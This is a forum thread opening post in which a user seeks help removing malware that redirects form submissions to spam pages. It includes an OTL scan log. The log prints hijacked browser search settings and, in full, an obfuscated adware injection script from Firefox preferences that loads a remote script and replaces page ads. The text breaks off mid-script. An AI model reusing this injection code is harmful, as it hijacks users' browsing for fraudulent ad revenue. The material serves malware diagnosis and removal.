Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Help: Unknown malware causes clicking links to sometimes redirect to a

malware removal spyware removal virus removal

  • This topic is locked This topic is locked

#1
awesomesauce

awesomesauce

    Member

  • Member
  • PipPip
  • 21 posts

Hi there,

 

I posted this the other day (10/10/14) but cannot seem to find the original post and had no replies. Not sure if it was deleted or not.

 

Here's the basic issue:

 

I have been streaming free movies online for the last few weeks and seem to have picked up a virus somewhere.

 

When I click "submit" or similar buttons on forms I *sometimes* get redirected to a spammy advert page.

 

For instance on the website: www.bankwest.com.au when I click "Go" to logon, it redirects to a page like: http://bluebec.net/alerts/dfhfdhg/?_rff=px.pluginh 

 

Any guidance would be much appreciated.

 

Thanks in advance!

 

Here is my OTL log:

 

OTL logfile created on: 14/10/2014 4:23:56 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17280)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 1.44 Gb Available Physical Memory | 37.89% Memory free
7.59 Gb Paging File | 4.89 Gb Available in Paging File | 64.47% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 112.29 Gb Free Space | 41.07% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.17% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/10/10 12:58:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mitey Fresh\Downloads\OTL.exe
PRC - [2014/10/03 21:30:08 | 001,514,040 | ---- | M] (Spotify Ltd) -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
PRC - [2014/09/04 12:44:30 | 003,802,448 | ---- | M] (LogMeIn Inc.) -- D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2014/02/20 12:03:06 | 000,859,464 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/20 12:03:05 | 000,394,568 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppgooglenaclpluginchrome.dll
MOD - [2014/02/20 12:03:04 | 013,632,840 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\PepperFlash\pepflashplayer.dll
MOD - [2014/02/20 12:03:03 | 004,060,488 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
MOD - [2014/02/20 12:02:59 | 000,716,616 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
MOD - [2014/02/20 12:02:58 | 000,100,168 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
MOD - [2014/02/20 12:02:56 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
MOD - [2014/02/20 12:02:54 | 000,051,016 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
MOD - [2009/02/26 10:45:08 | 000,024,912 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office12\Wordcnvpxy.cnv
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/08/22 16:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 16:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2014/08/19 09:03:37 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/05/27 16:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/05/20 16:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2009/07/14 12:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\rundll32.exe -- (671c50b0)
SRV - [2014/09/24 20:48:07 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/04 12:44:28 | 002,525,008 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- D:\Games\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014/05/30 04:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/04/19 13:26:23 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/21 09:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/11/29 18:23:38 | 001,296,728 | ---- | M] (www.BitComet.com) [On_Demand | Stopped] -- C:\Program Files (x86)\BitComet\tools\BitCometService.exe -- (BITCOMET_HELPER_SERVICE)
SRV - [2013/10/23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/07/17 19:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/01/23 09:57:12 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/03/01 17:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/01/10 22:28:18 | 012,311,904 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 17:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 17:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 00:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:07:05 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/05/20 16:26:28 | 002,060,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VX1000.sys -- (VX1000)
DRV:64bit: - [2009/09/17 19:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/14 12:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 12:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 12:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/20 13:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/11 07:35:42 | 000,187,392 | ---- | M] (Realtek Corporation                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/06/11 07:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/11 07:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/11 07:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/11 07:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 12:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.sweet-pag...q={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 6E 81 95 E1 01 42 CE 01  [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE11SR
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "sweet-page"
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.selectedEngine: "sweet-page"
FF - prefs.js..browser.startup.homepage: "http://www.sweet-pag...1A80P6304P6304"
FF - prefs.js..extensions.enabledAddons: faststartff%40gmail.com:4.3.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - prefs.js..extensions.ocqQ4lEIHr3.scode: "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1){return}}catch(e){};(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \"for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast....agName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['cpx_bet_55',500],['clove_fixed_ca_au',4400],['glispa_us2',700],['ybrant_csg3293',200],['adgorithm_2_4',200],['matomy_adj30',200],['dsnr_dasa_e1',200],['dsnr_nntbr_e1',200],['mango_apx13',100],['adsuduos_apx16',700],['web3_gen27',200],['mediawhite_27',200],['velis_gen21',200],['clove_rs19',400],['mari_qadabra',500],['baba_nontb_new7',200],['deliads_19',200],['cpx_favor5',400],['mari_gen28_4',300]],[['cpx_nontb30_tr',5494],['cpx_youtube',1473],['matomy_strm29',917],['web3_strm27',183],['mari_strm_tier1_35',1933]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('A9z92S5T=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"v2.ministerial5.com\"||window.self.location.hostname==\"advs.adgorithms.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.mediawhite.com\"||window.self.location.hostname==\"ads.qadserve.com\"||window.self.location.hostname==\"ads.deliads.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s1566088975320376897\"))continue}catch©{try{if(d[i].getAttribute(\"s1566088975320376897\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287609')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s1566088975320376897\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var 